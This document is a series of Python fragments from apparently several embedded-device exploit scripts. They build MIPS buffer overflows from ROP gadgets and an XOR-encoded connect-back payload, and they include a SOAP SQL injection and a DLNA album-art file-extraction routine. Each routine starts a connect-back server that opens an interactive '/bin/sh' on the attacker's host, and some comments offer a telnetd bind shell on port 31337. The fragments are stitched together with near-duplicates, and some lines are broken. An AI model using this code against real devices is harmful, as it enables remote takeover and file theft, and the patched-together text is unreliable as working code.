def main(command): logger=Logging() logger.LOG_INFO("Bulding overflow.") buf=build_overflow(logger) if command.startswith("find="): find_string=command.split("find=")[1] offset=find_offset(buf,find_string) logger.LOG_INFO("Offset of %s: %d" %(find_string,offset)) sys.exit(0) logger.LOG_INFO("Starting server.") server=ConnectbackServer(CALLBACK_IP,port=8080,logger=logger) pid=server.serve() target_ip=command if pid: try: send_overflow(buf,target_ip,logger) server.wait() except Exception as e: print e server.shutdown() else: logger.LOG_WARN("Failed to start connect-back server.") sys.exit(1) logger.LOG_INFO("Done.")
def do_overflow(callback_ip,target): Logging().LOG_INFO("doing overflow") connectback_server=ConnectbackServer(callback_ip,startcmd="/bin/sh -i") pid=connectback_server.serve() time.sleep(1) if pid: try: SoapSqlInjection(target,connectback_ip=callback_ip,action="overflow") connectback_server.wait() except Exception as e: print e Logging().LOG_WARN("Failed to connect. Killing connect-back server.") connectback_server.shutdown() raise e else: Logging().LOG_WARN("Failed to start connect-back server.")
def __init__(self, callback_ip_address, port, target_ip_address, logger=None): self.logger = logger if port: self.port = port else: self.port = 8080 self.target_ip_address = target_ip_address self.callback_ip_address = callback_ip_address self.offset_modifier = len(target_ip_address) if not self.logger: self.logger = Logging() #"/usr/sbin/telnetd -p 31337" #"/bin/sh -i" self.connectback_server = ConnectbackServer(callback_ip_address, port=port, startcmd="/bin/sh -i") self.endianness = self.__class__.endianness self.overflow_len = self.__class__.overflow_len
#locate stack. add 0x48+var_30+$sp into $s5, jalr $s6 ################################################################################ section=SC.gadget_section(240, 0x328F4, description="add offset from $sp into s5, jalr $s6") ################################################################################ #jump into stack. jalr $s5. This needs to get loaded into the stackfinder's jalr reg ################################################################################ section=SC.gadget_section(192, 0x1B1F4, description="Jump into stack via reg $s5. make sure the stackfinder jumps to this gadget.") connectback_server=ConnectbackServer(CALLBACK_IP,port=8080,startcmd="/bin/sh -i",connectback_shell=True) payload=ConnectbackPayload(CALLBACK_IP,BigEndian,port=8080) encoded_payload=MipsXorEncoder(payload,badchars=['\0']) SC.string_section(268,encoded_payload.shellcode, description="connect back payload") buffer_overflow_string=OverflowBuffer(BigEndian,576,SC.section_list) pretty_msearch=msearch_crash.MsearchCrash(buffer_overflow_string.pretty_string()) print "\n\n"+str(pretty_msearch)+"\n\n"
def main(options, logger=None): outfile = None path = None connectback_ip = None port = None host = None if not logger: logger = Logging() try: port = options["port"] except KeyError: port = 8200 try: connectback_ip = options["connectback_ip"] except KeyError: pass try: host = options["target"] except KeyError: pass try: path = options["extract"] except KeyError: pass if path: try: outfile = options["outfile"] host = options["target"] logger.LOG_DEBUG("main() got path=%s" % path) albumart_extract(host, path, outfile=outfile, logger=logger) exit(0) except KeyError: print( "File extraction requires a remote path, local file, and target IP address." ) usage(1) if connectback_ip: buf = DLNA_Overflow(1536, connectback_ip, logger=logger).buf try: find_str = options["find_string"] logger.LOG_INFO("Finding offset of %s" % find_str) find = find_str if find_str.startswith("0x"): find = int(find_str, 16) offset = buf.find_offset(find) logger.LOG_INFO("Offset: %s" % offset) exit(0) except KeyError: pass if not host: print("Remote exploitation requires a target IP address.") usage(1) else: print( "No file extraction, overflow search string, or remote target was provided." ) usage(1) if not do_verification(host, port=port, logger=logger): exit(1) server = ConnectbackServer(connectback_ip, startcmd="/bin/sh -i") server.serve() try: do_overflow(host, buf, port=port, logger=logger) except Exception as e: server.shutdown() raise e server.wait()
def main(options): logger=Logging() logger.LOG_INFO("Bulding overflow.") connectback_ip=options["connectback_ip"] buf=build_overflow(connectback_ip,logger=logger) if options.has_key("overflow_file"): logger.LOG_INFO("Writing overflow string to file: %s" % options["overflow_file"]) open(options["overflow_file"],"wb").write(str(buf)) if options.has_key("find_string"): find_string=options["find_string"] offset=find_offset(buf,find_string) logger.LOG_INFO("Offset of %s: %d" %(find_string,offset)) sys.exit(0) logger.LOG_INFO("Starting server.") try: server=ConnectbackServer(connectback_ip,port=8080,logger=logger) pid=server.serve() except Exception as e: logger.LOG_WARN("Failed to start connect-back server: %s" % str(e)) sys.exit(1) if options.has_key("target"): target_ip=options["target"] target_ip=command try: send_overflow(buf,target_ip,logger) server.wait() except Exception as e: print e server.shutdown() else: try: server.wait() except: server.shutdown() logger.LOG_INFO("Done.")
search_string = sys.argv[1] if search_string.startswith("0x"): search_value = int(search_string, 16) else: search_value = search_string offset = buf.find_offset(search_value) if (offset < 0): print "Couldn't find string %s in the overflow buffer." % search_string else: print "Found string %s at\noffset: %d" % (search_string, offset) exit(0) addr = sys.argv[1] port = int(sys.argv[2]) connectback_server = ConnectbackServer(CALLBACK_IP, startcmd="/bin/sh -i") #Or non-interactive exploitation: #connectback_server=ConnectbackServer(connectback_host,startcmd="/usr/sbin/telnetd -p 31337",connectback_shell=False) pid = connectback_server.serve() time.sleep(1) if pid: try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((addr, port)) logger.LOG_INFO("sending exploit.") sock.send(str(buf)) sock.close() connectback_server.wait() except Exception as e: logger.LOG_WARN("Failed to connect. ") logger.LOG_WARN("Failed to connect. Killing connect-back server.")
def main(options,logger=None): outfile=None path=None connectback_ip=None port=None host=None if not logger: logger=Logging() try: port=options["port"] except KeyError: port=8200 try: connectback_ip=options["connectback_ip"] except KeyError: pass try: host=options["target"] except KeyError: pass try: path=options["extract"] except KeyError: pass if path: try: outfile=options["outfile"] host=options["target"] # logger.LOG_DEBUG("main() got path=%s" % path) albumart_extract(host,path,outfile=outfile,logger=logger) exit(0) except KeyError: print("File extraction requires a remote path, local file, and target IP address.") usage(1) if connectback_ip: try: logger.set_max_log_level(Logging.INFO) buf=DLNA_Overflow(1536,connectback_ip,logger=logger).buf logger.set_max_log_level(Logging.DEBUG) except DLNAOverflowException as e: logger.LOG_WARN("%s" % str(e)) exit(1) try: find_str=options["find_string"] logger.LOG_INFO("Finding offset of %s" % find_str) find=find_str if find_str.startswith("0x"): find=int(find_str,16) offset=buf.find_offset(find) logger.LOG_INFO("Offset: %s" % offset) exit(0) except KeyError: pass if not host: print("Remote exploitation requires a target IP address.") usage(1) else: print("No file extraction, overflow search string, or remote target was provided.") usage(1) if not do_verification(host,port=port,logger=logger): exit(1) server=ConnectbackServer(connectback_ip,startcmd="/bin/sh -i") server.serve() try: do_overflow(host,buf,port=port,logger=logger) except Exception as e: server.shutdown() raise e server.wait()